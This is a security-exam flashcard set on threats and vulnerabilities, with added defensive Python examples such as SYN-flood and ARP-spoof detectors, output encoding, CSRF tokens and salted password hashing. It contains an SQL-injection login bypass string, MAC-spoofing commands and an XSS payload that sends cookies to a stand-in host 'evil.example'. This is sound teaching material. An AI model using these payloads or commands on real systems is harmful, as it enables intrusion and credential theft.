Threat & Vulnerabilities Flashcards
Person or event with the potential to have an impact on a valuable resource
Threat
Flaw or weakness within a system that can be exploited. Quality within a resource or its environment that might allow a threat to be realized
Vulnerability
The likelihood of a threat exploiting a vulnerability
Risk
Act of protecting data and information from unauthorized access, unlawful modification, disruption, disclosure, corruption, and destruction
Information Security
Threat that originates within the organization
Internal / Insider Threat
The act of protecting the systems (the devices) that hold and process critical data
Information System Security
CIA Triad
Confidentiality
Integrity
Availability
Threats that are external to an organization
External Threat
List of publicly disclosed computer security weaknesses
CVE (Common Vulnerabilities and Exposures)
Vulnerability that is discovered or exploited before the vendor can issue a patch to fix it
Zero-day vulnerability
Software code that takes advantage of a security flaw or vulnerability
Exploit
Confidentiality protections such as locked doors, fences, security guards, security cameras, and safes are examples of what type of protection?
Physical protections
Confidentiality protections such as encryption, passwords, firewalls, and MFA are examples of what type of protection?
Electronic protections
2 best methods for integrity
1) Hashing
2) Checksums
Running a file through a one-way hash function (not encryption: there is no key and the output cannot be reversed) produces a unique digital fingerprint of the file
Hashing
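The integrity check these two cards describe, as an added example that is not part of the original flashcard set: a file is fingerprinted with SHA-256, the digest is recorded in a manifest in the same `digest  filename` layout that `sha256sum` uses, and the manifest is re-checked after the file is altered at rest. The file contents, names and the temporary directory are constructed for the demo.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path

# Constructed sample content (not from any real file).
ORIGINAL = b"payroll,2024-01,alice,5000\n"
TAMPERED = b"payroll,2024-01,alice,9000\n"


def sha256_file(path, chunk_size=65536):
    """Stream a file through SHA-256 and return the hex digest (its fingerprint)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def write_manifest(paths):
    """Record digests in the 'digest  filename' format that sha256sum emits."""
    return "".join(f"{sha256_file(p)}  {Path(p).name}\n" for p in paths)


def verify_manifest(manifest, directory):
    """Return {filename: True/False}; False means the file no longer matches its digest."""
    results = {}
    for line in manifest.splitlines():
        expected, name = line.split("  ", 1)
        actual = sha256_file(Path(directory) / name)
        # compare_digest avoids timing leaks when the expected digest comes from outside
        results[name] = hmac.compare_digest(expected, actual)
    return results


def demo():
    """Fingerprint a file, tamper with it at rest, and show the manifest catches it."""
    with tempfile.TemporaryDirectory() as d:
        p = Path(d) / "payroll.csv"
        p.write_bytes(ORIGINAL)
        manifest = write_manifest([p])
        before = verify_manifest(manifest, d)
        p.write_bytes(TAMPERED)  # simulate unauthorized modification in storage
        after = verify_manifest(manifest, d)
        return before["payroll.csv"], after["payroll.csv"]


if __name__ == "__main__":
    print(demo())  # (True, False)
```

The manifest itself must be stored or signed somewhere the attacker cannot write; a digest sitting beside the file it protects can be rewritten along with it.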
Occurs when data is modified at rest (in storage) or in transit
Failure of integrity
Having good backup strategies and disaster recovery plans ensure which one of the CIA triad?
Availability
3 main things to remember regarding the CIA triad
Confidentiality – Encryption (like WPA2)
Integrity – Hashing (like MD5, SHA-1; both have known collisions, so use SHA-256 or stronger in new designs)
Availability – Redundancy & reliability
System that deviates from the organization's approved configuration baseline
(A configuration baseline is a set of recommendations for deploying a computer in a hardened configuration)
Non-compliant System
5 main vulnerabilities to network and systems
1) Non-compliant systems
2) Unpatched systems
3) Unprotected systems
4) EOL (End-of-Life) OSs
5) BYOD (Bring your own device)
An attack that attempts to make a computer or server’s resources unavailable
Denial of Service (DoS)
Specialized type of DoS attack that sends more packets to a server or host than it can handle
Flood attack
Type of flood DoS attack that happens when too many pings (ICMP Echo Requests) are being sent
Ping Flood
Type of flood DoS attack where the attacker initiates multiple TCP sessions but never completes the three-way handshake
SYN Flood
3 ways to prevent DoS attacks
1) Flood Guards
2) Time Outs
3) Intrusion Prevention
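Two of the three mitigations above (a flood guard and a time-out) applied to the SYN flood card, as an added example that is not part of the original flashcards: the packet summaries are constructed, a SYN is treated as half-open until the same client port sends an ACK, entries older than the time-out are reaped, and any source holding more than a threshold of half-open entries is reported. Only the client-side flags are modelled; a real monitor would also see the server's SYN-ACK.

```python
from collections import defaultdict

# Constructed packet summaries (time_s, src_ip, src_port, tcp_flags); not real capture data.
PACKETS = [
    (0.0, "10.0.0.5", 40001, "S"), (0.1, "10.0.0.5", 40001, "A"),  # legit client completes
    (0.2, "10.0.0.6", 40002, "S"), (0.3, "10.0.0.6", 40002, "A"),
] + [(1.0 + i * 0.01, "203.0.113.9", 50000 + i, "S") for i in range(200)]  # never ACKs


def half_open_connections(packets, now, timeout):
    """Replay packets; return {src_ip: count} of SYNs with no completing ACK
    that are still younger than `timeout` seconds at time `now`."""
    pending = {}  # (src, sport) -> time the SYN was seen
    for t, src, sport, flags in packets:
        key = (src, sport)
        if flags == "S":
            pending[key] = t
        elif flags == "A":
            pending.pop(key, None)  # handshake completed: the entry is released
    counts = defaultdict(int)
    for (src, _), t in pending.items():
        if now - t < timeout:  # the time-out reaps stale half-open entries
            counts[src] += 1
    return dict(counts)


def flood_sources(packets, now, timeout=30.0, threshold=100):
    """Flood-guard rule: any source holding more than `threshold` half-open
    connections is reported (a candidate for rate limiting or blackholing)."""
    return {src for src, n in half_open_connections(packets, now, timeout).items()
            if n > threshold}


if __name__ == "__main__":
    print(flood_sources(PACKETS, now=3.0))  # {'203.0.113.9'}
```

With a spoofed-source flood the offending addresses are random, so the per-source rule alone is not enough; that is where SYN cookies or upstream scrubbing come in.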
Type of DoS attack that exploits a security flaw to permanently break a networking device by reflashing its firmware
Permanent Denial of Service (PDoS)
Attack that creates a large number of processes to use up the available processing power of a computer
Fork Bomb
Uses lots of machines to attack a server to create a DoS
Distributed Denial of Service (DDoS)
Type of DDoS attack where the attacker sends small DNS queries with the victim's spoofed source IP to open resolvers, which then flood the victim with much larger DNS responses
DNS Amplification
A way to prevent a DoS attack that identifies attacking IP addresses and routes their traffic to a null interface where it is dropped (blackhole) or to a controlled server where it can be analyzed (sinkhole)
Blackhole/Sinkhole
A way to prevent a DoS attack that identifies and responds to small-scale DoS attacks
Intrusion Prevention
A way to prevent a DDoS attack that scales up when demand increases
Elastic Cloud Infrastructure
(companies such as Cloudflare and Akamai)
3 main spoofing attacks
1) IP spoofing
2) MAC spoofing
3) ARP spoofing
Attack that occurs when an attacker masquerades as another person by falsifying their identity electronically
Spoofing
Spoof that modifies the source address of an IP packet to hide the identity of the sender or impersonate another client
IP spoofing
What layer of the OSI model is IP spoofing a part of?
Layer 3
What layer of the OSI model is MAC spoofing a part of?
Layer 2
Attacker changes the MAC address to pretend the use of a different network interface card or device
MAC spoofing
Relies on a list of all known and authorized MAC addresses (easily bypassed by MAC spoofing, since the MAC address is under the attacker's control)
MAC Filtering
Command to spoof a MAC address (macOS/BSD ifconfig syntax; Linux uses ip link, and some drivers require the interface to be down first)
sudo ifconfig en0 ether <MAC>
sudo ip link set dev eth0 address <MAC>
Type of spoof attack where the attacker sends falsified ARP messages over a local area network so that another host's IP address (typically the default gateway's) becomes associated with the attacker's MAC address
ARP spoofing
Occurs when an attacker puts themself between the victim and the intended destination
On-Path attack
Ways to produce an On-Path attack
1) ARP poisoning
2) DNS poisoning
3) Introducing a rogue WAP (Wireless access point)
4) Introducing rogue hub/switch
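Detection logic for the ARP spoofing card and the ARP poisoning entry above, as an added example that is not part of the original flashcards: the ARP reply log is constructed, the detector keeps its own IP-to-MAC table (optionally seeded with static, trusted bindings as Dynamic ARP Inspection does) and raises an alert whenever an IP changes owner, then points out the MAC that has taken over more than one IP, which is the on-path host.

```python
from collections import defaultdict

# Constructed ARP reply log (time_s, sender_ip, sender_mac); not a real capture.
ARP_REPLIES = [
    (0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),   # gateway announces itself
    (0.5, "192.168.1.20", "aa:bb:cc:00:00:20"),  # victim workstation
    (5.0, "192.168.1.1", "de:ad:be:ef:00:99"),   # a third host now claims the gateway IP
    (5.1, "192.168.1.20", "de:ad:be:ef:00:99"),  # ...and the victim's IP: both sides poisoned
]


def detect_arp_spoof(replies, trusted=None):
    """Replay ARP replies; return alerts (time, ip, old_mac, new_mac) for every change
    of owner. `trusted` is an optional static {ip: mac} map checked first, which is
    what a static ARP entry or a DAI binding table provides."""
    table = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    alerts = []
    for t, ip, mac in replies:
        mac = mac.lower()
        old = table.get(ip)
        if old is not None and old != mac:
            alerts.append((t, ip, old, mac))
        table[ip] = mac  # track the latest claim so a flip back is reported too
    return alerts


def attacker_macs(alerts):
    """A single MAC appearing as the new owner of several IPs is the on-path host."""
    by_mac = defaultdict(set)
    for _, ip, _, new in alerts:
        by_mac[new].add(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    found = detect_arp_spoof(ARP_REPLIES)
    print(found)
    print(attacker_macs(found))  # {'de:ad:be:ef:00:99': {'192.168.1.1', '192.168.1.20'}}
```

A legitimate NIC replacement also produces one alert, so the useful signal is the second function: one MAC suddenly owning the gateway and a client at the same time.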
During an on-path attack, occurs when valid data is captured by the attacker and then repeated, either immediately or after a delay
Replay
During an on-path attack, occurs when the attacker inserts themself between the two hosts and passes the traffic through, able to read or alter it
Relay
Occurs when an attacker on the path intercepts the client's initial plain-HTTP request and rewrites the site's HTTPS links and redirects to HTTP, so the victim's browser talks plaintext to the attacker while the attacker talks HTTPS to the real server (HSTS is the defense)
SSL Stripping
Occurs when an attacker attempts to have a client or server abandon a higher security mode in favor of a lower security mode
Downgrade attack
SQL stand for
Structured Query Language
An attack consisting of the insertion or injection of an SQL query via input data from the client to a web application
SQL Injection
Insertion of additional information or code through data input from a client to an application
Injection attack
4 Common types of Injection attacks
1) SQL (most common)
2) HTML
3) XML
4) LDAP
Example of SQL injection (the injected clause makes the WHERE condition always True)
Typical:
username: Jason
password: pass123
SQL Injection
username: Jason
password: ' OR '1'='1
(the query becomes WHERE username='Jason' AND password='' OR '1'='1', which matches every row)
How can SQL injection be prevented? (2)
1) Input validation
2) Least privilege
Attack occurs when an attacker embeds malicious scripting commands on a trusted website
Cross-Site Scripting (XSS)
3 types of Cross-Site Scripting (XSS) attacks
1) Stored/Persistent
2) Reflected
3) DOM-based
Type of XSS attack that attempts to get data provided by the attacker saved on the web server (for example in a comment or profile field) so it is served to every later visitor
Stored/Persistent
Type of XSS attack that attempts to have a non-persistent effect activated by a victim clicking a crafted link, with the payload reflected back in the response
Reflected
Type of XSS attack where the payload is executed entirely in the victim's browser by the page's own client-side script writing attacker-controlled data (such as a URL fragment) into the page, without the server ever seeing it
Document Object Model (DOM)-based
How to prevent XSS attacks? (2)
1) Output encoding
2) Proper input validation
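Output encoding from the prevention list, applied to the stored XSS card, as an added example that is not part of the original flashcards: the stored comment is a constructed payload, one renderer interpolates it raw into the page, the other encodes it for the HTML body, and a third shows that in an attribute context the value must also be quoted. The board markup and the host name in the payload are made up for the demo.

```python
import html

# Constructed comment an attacker posts to a public board (stored/persistent XSS payload).
PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_unsafe(comment):
    """Interpolates the stored comment straight into HTML: the browser runs the script."""
    return f"<div class='comment'>{comment}</div>"


def render_safe(comment):
    """Output-encodes for the HTML body context: < > & and quotes become entities,
    so the browser shows the text of the payload instead of executing it."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def attr_safe(value):
    """Attribute context: encoding alone is not enough, the attribute must also be
    quoted. Unquoted, `x onmouseover=alert(1)` breaks out without any < or > at all."""
    return f'<input value="{html.escape(value, quote=True)}">'


def contains_live_script(fragment):
    """Crude check used only by the demo: does the markup still carry a real <script> tag?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(contains_live_script(render_unsafe(PAYLOAD)))  # True
    print(contains_live_script(render_safe(PAYLOAD)))    # False
    print(attr_safe('x" onmouseover="alert(1)'))
```

Encoding is context-specific: the HTML-body escaper above is wrong for data placed inside a `<script>` block or a URL, which need JavaScript-string or URL encoding respectively. Input validation (allowlisting what a field may contain) is the second layer, not a substitute.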
Attack that occurs when an attacker forces the user to execute actions on a web server for which they are already authenticated
Cross-Site Request Forgery (XSRF/CSRF)
How to prevent XSRF? (4)
1) Tokens
2) Encryption
3) XML file scanning
4) Cookie verification
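The first item in the list above, an anti-CSRF (synchronizer) token, as an added example that is not part of the original flashcards: the token is bound to the session with an HMAC under a server secret, a state-changing handler refuses any request whose form does not carry a token valid for that session, and verification is constant-time. The session identifiers, the `request` dict standing in for a framework request object, and the endpoint are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Per-deployment key; generated fresh here for the demo, would live in a secret store.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Token = nonce.HMAC(secret, session_id:nonce). A cross-site form cannot read
    this value, so a forged request arrives without it (or with one for another session)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    """Recompute the MAC for this session and compare in constant time."""
    try:
        nonce, mac = token.split(".", 1)
    except (ValueError, AttributeError):
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(request, session_id):
    """State-changing endpoint (hypothetical): the browser has already sent the session
    cookie, so the only thing distinguishing the user's own form from a forged one
    is the token. Returns an HTTP status code."""
    if not verify_csrf_token(session_id, request.get("csrf_token", "")):
        return 403
    return 200


if __name__ == "__main__":
    tok = issue_csrf_token("sess-A")
    print(handle_transfer({"amount": 100}, "sess-A"))                      # 403: forged form
    print(handle_transfer({"amount": 100, "csrf_token": tok}, "sess-A"))   # 200: real form
```

Setting the session cookie with `SameSite=Lax` or `Strict` is the complementary browser-side control; together with the token it covers both the forged-POST case and the top-level navigation case.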
Tool used to test the strength of passwords to ensure password policies are being followed properly
Password Analysis tool
Uses comparative analysis to break passwords and systematically continues guessing until the password is determined
Password Cracker
2 most well-known password crackers
1) Cain & Abel
2) John the Ripper
4 types of password cracking methods
1) Password Guessing
2) Dictionary Attack
3) Brute-force Attack
4) Cryptanalysis Attack
Type of password cracking attack that occurs when a weak password is simply figured out by a person
Password Guessing
Type of password cracking attack method where a program attempts to guess the password by using a list of possible passwords (lists of common passwords)
Dictionary Attack
Type of password cracking attack method where a program attempts to try every possible combination until it cracks the password (counts from 000 to 001 to 002)
Brute-Force attack
Type of password cracking attack that compares a captured password hash against precomputed hashes in a lookup table / rainbow table
Cryptanalysis Attack
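The dictionary and lookup-table attacks from the cards above, and the defense a practitioner wants to see beside them, as an added example that is not part of the original flashcards: a tiny constructed wordlist is hashed once into a lookup table, which instantly recovers an unsalted SHA-256 hash; the same password stored with a per-user random salt and PBKDF2 iterations is not in the table, and the attacker has to redo the slow derivation for every record. The usernames, passwords and wordlist are constructed for the demo.

```python
import hashlib
import os

WORDLIST = ["123456", "password", "pass123", "letmein", "qwerty"]  # constructed mini dictionary

# Constructed "leaked" unsalted SHA-256 hashes, the weak storage scheme.
LEAK_UNSALTED = {
    "jason": hashlib.sha256(b"pass123").hexdigest(),
    "dana": hashlib.sha256(b"S3cur3-Pa55phrase!").hexdigest(),  # not in the wordlist
}


def build_lookup(wordlist):
    """Precompute hash -> plaintext once; this is the idea behind a rainbow/lookup table."""
    return {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}


def crack_unsalted(leak, lookup):
    """Dictionary attack with O(1) per hash: every leaked hash is just a table lookup."""
    return {user: lookup.get(h) for user, h in leak.items()}


def store_salted(password, iterations=100_000):
    """Per-user random salt plus PBKDF2 iterations: a table built once is useless,
    and each guess costs the attacker the full iteration count."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, dk


def crack_salted(record, wordlist):
    """The attacker must redo the slow derivation per record; returns the word or None."""
    salt, iterations, dk = record
    for w in wordlist:
        if hashlib.pbkdf2_hmac("sha256", w.encode(), salt, iterations) == dk:
            return w
    return None


if __name__ == "__main__":
    lookup = build_lookup(WORDLIST)
    print(crack_unsalted(LEAK_UNSALTED, lookup))   # {'jason': 'pass123', 'dana': None}
    rec = store_salted("pass123")
    print(lookup.get(rec[2].hex()))                # None: salt defeats the precomputed table
    print(crack_salted(rec, WORDLIST))             # 'pass123', but only after a full PBKDF2 run
```

Salting stops precomputation; it does not stop a dictionary attack on a weak password, which is why the iteration count (or a memory-hard function such as scrypt or Argon2) and a password policy both still matter.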
(No longer included in exam)
Type of password cracking attack that attempts to crack a password by threatening or causing a person physical harm in order to make them tell you the password
Rubber Hose Attack
An employee or other trusted insider who uses their authorized network access in unauthorized ways to harm the company
Insider Threat
A specific type of malware that is tied to either a logical event or a specific time (like entering a code every 24 hours)
Logic Bomb
Which type of threat actor can accidentally or inadvertently cause a security incident in your organization?
a) Hacktivist
b) Insider threat
c) Organized Crime
d) APT (advanced persistent threats)
b) Insider threat
Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?
a) SQL injection
b) Cross-site scripting
c) Buffer overflow
d) Denial of Service
a) SQL injection
*SQL injection is a type of attack where malicious SQL code is inserted into a web application's input fields, such as search boxes or login forms, in order to manipulate the database. If the application does not properly validate or sanitize user input, the attacker could exploit this vulnerability to:
1) Retrieve unauthorized data from the database.
2) Expose sensitive information such as passwords, personal details, or other confidential records.
3) Potentially modify or delete data, depending on the severity of the vulnerability.
This attack directly targets the database and could lead to inadvertent disclosure of sensitive information, especially if the attacker successfully exploits the vulnerability to retrieve private or restricted data.
Why the other attacks are less likely for inadvertent disclosure:
b) Cross-site scripting (XSS): XSS attacks primarily target the users of a website, not the database. They allow attackers to inject malicious scripts into web pages viewed by other users, which could lead to the theft of cookies or session tokens, but not necessarily database information.
c) Buffer overflow: This attack generally targets vulnerabilities in a program’s memory and can lead to crashes or code execution on the system. While it can be dangerous, its primary goal is not to retrieve data from a database.
d) Denial of Service (DoS): A DoS attack seeks to make a system or service unavailable by overwhelming it with traffic or requests. It does not aim to extract or disclose information from a database but rather to disrupt services.*
Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website showing pop-up messages asking for their username and password. Simultaneously, his security team has noticed a large increase in the number of compromised user accounts on the system. What type of attack is most likely the cause of both of these events?
a) SQL injection
b) Rootkit
c) Cross-Site request forgery
d) Cross-Site scripting
d) Cross-Site scripting